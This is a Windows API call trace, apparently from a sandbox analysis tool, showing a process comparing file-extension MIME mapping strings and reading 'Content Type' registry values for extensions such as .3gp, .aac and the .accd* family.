[0103.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dxr=application/x-director", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ebk=application/x-expandedbook", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eps=application/postscript", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".evy=application/envoy", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe=application/x-msdos-program", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fdf=application/vnd.fdf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fif=application/fractals", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flm=application/vnd.kde.kivio", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fml=application/x-file-mirror-list", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gzip=application/x-gzip", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gnumeric=application/x-gnumeric", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gtar=application/x-gtar", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gz=application/x-gzip", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hdf=application/x-hdf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hlp=application/winhlp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hpf=application/x-icq-hpf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hqx=application/mac-binhex40", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hta=application/hta", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ims=application/vnd.ms-ims", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ins=application/x-internet-signup", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".iii=application/x-iphone", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".iso=application/x-iso9660-image", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jar=application/java-archive", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".karbon=application/vnd.kde.karbon", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kfo=application/vnd.kde.kformula", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kon=application/vnd.kde.kontour", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kpr=application/vnd.kde.kpresenter", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kpt=application/vnd.kde.kpresenter", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kwd=application/vnd.kde.kword", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kwt=application/vnd.kde.kword", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".latex=application/x-latex", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lha=application/x-lzh", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lcc=application/fastman", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lrm=application/vnd.ms-lrm", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lz=application/x-lzip", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzh=application/x-lzh", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzma=application/x-lzma", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzo=application/x-lzop", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzx=application/x-lzx", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m13=application/x-msmediaview", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m14=application/x-msmediaview", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpp=application/vnd.ms-project", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mvb=application/x-msmediaview", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".man=application/x-troff-man", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mdb=application/x-msaccess", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".me=application/x-troff-me", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ms=application/x-troff-ms", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".msi=application/x-msi", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpkg=vnd.apple.installer+xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mny=application/x-msmoney", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nix=application/x-mix-transfer", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".o=application/x-object", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".oda=application/oda", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odb=application/vnd.oasis.opendocument.database", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odc=application/vnd.oasis.opendocument.chart", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odf=application/vnd.oasis.opendocument.formula", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odg=application/vnd.oasis.opendocument.graphics", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odi=application/vnd.oasis.opendocument.image", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odm=application/vnd.oasis.opendocument.text-master", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp=application/vnd.oasis.opendocument.presentation", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods=application/vnd.oasis.opendocument.spreadsheet", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ogg=application/ogg", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt=application/vnd.oasis.opendocument.text", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".otg=application/vnd.oasis.opendocument.graphics-template", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".oth=application/vnd.oasis.opendocument.text-web", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".otp=application/vnd.oasis.opendocument.presentation-template", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots=application/vnd.oasis.opendocument.spreadsheet-template", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ott=application/vnd.oasis.opendocument.text-template", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p10=application/pkcs10", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p12=application/x-pkcs12", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7b=application/x-pkcs7-certificates", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7m=application/pkcs7-mime", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7r=application/x-pkcs7-certreqresp", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7s=application/pkcs7-signature", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".package=application/vnd.autopackage", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pfr=application/font-tdpfr", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pkg=vnd.apple.installer+xml", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf=application/pdf", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pko=application/vnd.ms-pki.pko", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pl=application/x-perl", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pnq=application/x-icq-pnq", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pot=application/mspowerpoint", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps=application/mspowerpoint", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt=application/mspowerpoint", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppz=application/mspowerpoint", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ps=application/postscript", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pub=application/x-mspublisher", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qpw=application/x-quattropro", cchCount1=4, lpString2=".3g2", cchCount2=4) returned 3 [0103.677] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".3gp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.677] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".3gp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.678] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x16) returned 0x0 [0103.678] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aea4, lpcbData=0x19fc20*=0x16 | out: lpType=0x19fc10*=0x1, lpData="video/3gpp", lpcbData=0x19fc20*=0x16) returned 0x0 [0103.678] CharLowerBuffW (in: lpsz="video/3gpp", cchLength=0xa | out: lpsz="video/3gpp") returned 0xa [0103.678] CharLowerBuffW (in: lpsz=".3gp", cchLength=0x4 | out: lpsz=".3gp") returned 0x4 [0103.678] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".3gp2", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.678] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".3gp2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.678] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x18) returned 0x0 [0103.678] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a53cc, lpcbData=0x19fc20*=0x18 | out: lpType=0x19fc10*=0x1, lpData="video/3gpp2", lpcbData=0x19fc20*=0x18) returned 0x0 [0103.678] CharLowerBuffW (in: lpsz="video/3gpp2", cchLength=0xb | out: lpsz="video/3gpp2") returned 0xb [0103.678] CharLowerBuffW (in: lpsz=".3gp2", cchLength=0x5 | out: lpsz=".3gp2") returned 0x5 [0103.678] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".3gpp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.678] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".3gpp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.679] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x16) returned 0x0 [0103.679] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aecc, lpcbData=0x19fc20*=0x16 | out: lpType=0x19fc10*=0x1, lpData="video/3gpp", lpcbData=0x19fc20*=0x16) returned 0x0 [0103.679] CharLowerBuffW (in: lpsz="video/3gpp", cchLength=0xa | out: lpsz="video/3gpp") returned 0xa [0103.679] CharLowerBuffW (in: lpsz=".3gpp", cchLength=0x5 | out: lpsz=".3gpp") returned 0x5 [0103.706] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".3mf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.706] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".3mf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.706] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.706] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.706] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".a", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.706] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.707] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.707] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aac", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.707] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.707] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="audio/vnd.dlna.adts", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.707] CharLowerBuffW (in: lpsz="audio/vnd.dlna.adts", cchLength=0x13 | out: lpsz="audio/vnd.dlna.adts") returned 0x13 [0103.707] CharLowerBuffW (in: lpsz=".aac", cchLength=0x4 | out: lpsz=".aac") returned 0x4 [0103.707] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ac3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.707] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ac3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.707] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2e) returned 0x0 [0103.707] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ec, lpcbData=0x19fc20*=0x2e | out: lpType=0x19fc10*=0x1, lpData="audio/vnd.dolby.dd-raw", lpcbData=0x19fc20*=0x2e) returned 0x0 [0103.707] CharLowerBuffW (in: lpsz="audio/vnd.dolby.dd-raw", cchLength=0x16 | out: lpsz="audio/vnd.dolby.dd-raw") returned 0x16 [0103.707] CharLowerBuffW (in: lpsz=".ac3", cchLength=0x4 | out: lpsz=".ac3") returned 0x4 [0103.707] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accda", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.708] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accda", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.708] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x36) returned 0x0 [0103.708] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f8354, lpcbData=0x19fc20*=0x36 | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.addin", lpcbData=0x19fc20*=0x36) returned 0x0 [0103.708] CharLowerBuffW (in: lpsz="application/msaccess.addin", cchLength=0x1a | out: lpsz="application/msaccess.addin") returned 0x1a [0103.708] CharLowerBuffW (in: lpsz=".accda", cchLength=0x6 | out: lpsz=".accda") returned 0x6 [0103.708] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdb", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.708] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accdb", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.708] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2a) returned 0x0 [0103.708] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x2a | out: lpType=0x19fc10*=0x1, lpData="application/msaccess", lpcbData=0x19fc20*=0x2a) returned 0x0 [0103.708] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0103.708] CharLowerBuffW (in: lpsz=".accdb", cchLength=0x6 | out: lpsz=".accdb") returned 0x6 [0103.708] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.709] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accdc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.709] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x32) returned 0x0 [0103.709] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f8354, lpcbData=0x19fc20*=0x32 | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.cab", lpcbData=0x19fc20*=0x32) returned 0x0 [0103.709] CharLowerBuffW (in: lpsz="application/msaccess.cab", cchLength=0x18 | out: lpsz="application/msaccess.cab") returned 0x18 [0103.709] CharLowerBuffW (in: lpsz=".accdc", cchLength=0x6 | out: lpsz=".accdc") returned 0x6 [0103.709] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accde", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.709] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accde", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.709] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x34) returned 0x0 [0103.709] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f842c, lpcbData=0x19fc20*=0x34 | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.exec", lpcbData=0x19fc20*=0x34) returned 0x0 [0103.709] CharLowerBuffW (in: lpsz="application/msaccess.exec", cchLength=0x19 | out: lpsz="application/msaccess.exec") returned 0x19 [0103.709] CharLowerBuffW (in: lpsz=".accde", cchLength=0x6 | out: lpsz=".accde") returned 0x6 [0103.709] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdr", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.709] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accdr", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.710] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x3a) returned 0x0 [0103.710] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2441aac, lpcbData=0x19fc20*=0x3a | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.runtime", lpcbData=0x19fc20*=0x3a) returned 0x0 [0103.710] CharLowerBuffW (in: lpsz="application/msaccess.runtime", cchLength=0x1c | out: lpsz="application/msaccess.runtime") returned 0x1c [0103.710] CharLowerBuffW (in: lpsz=".accdr", cchLength=0x6 | out: lpsz=".accdr") returned 0x6 [0103.710] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.710] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".accdt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.770] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x3c) returned 0x0 [0103.770] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2441b4c, lpcbData=0x19fc20*=0x3c | out: lpType=0x19fc10*=0x1, lpData="application/msaccess.template", lpcbData=0x19fc20*=0x3c) returned 0x0 [0103.770] CharLowerBuffW (in: lpsz="application/msaccess.template", cchLength=0x1d | out: lpsz="application/msaccess.template") returned 0x1d [0103.770] CharLowerBuffW (in: lpsz=".accdt", cchLength=0x6 | out: lpsz=".accdt") returned 0x6 [0103.770] 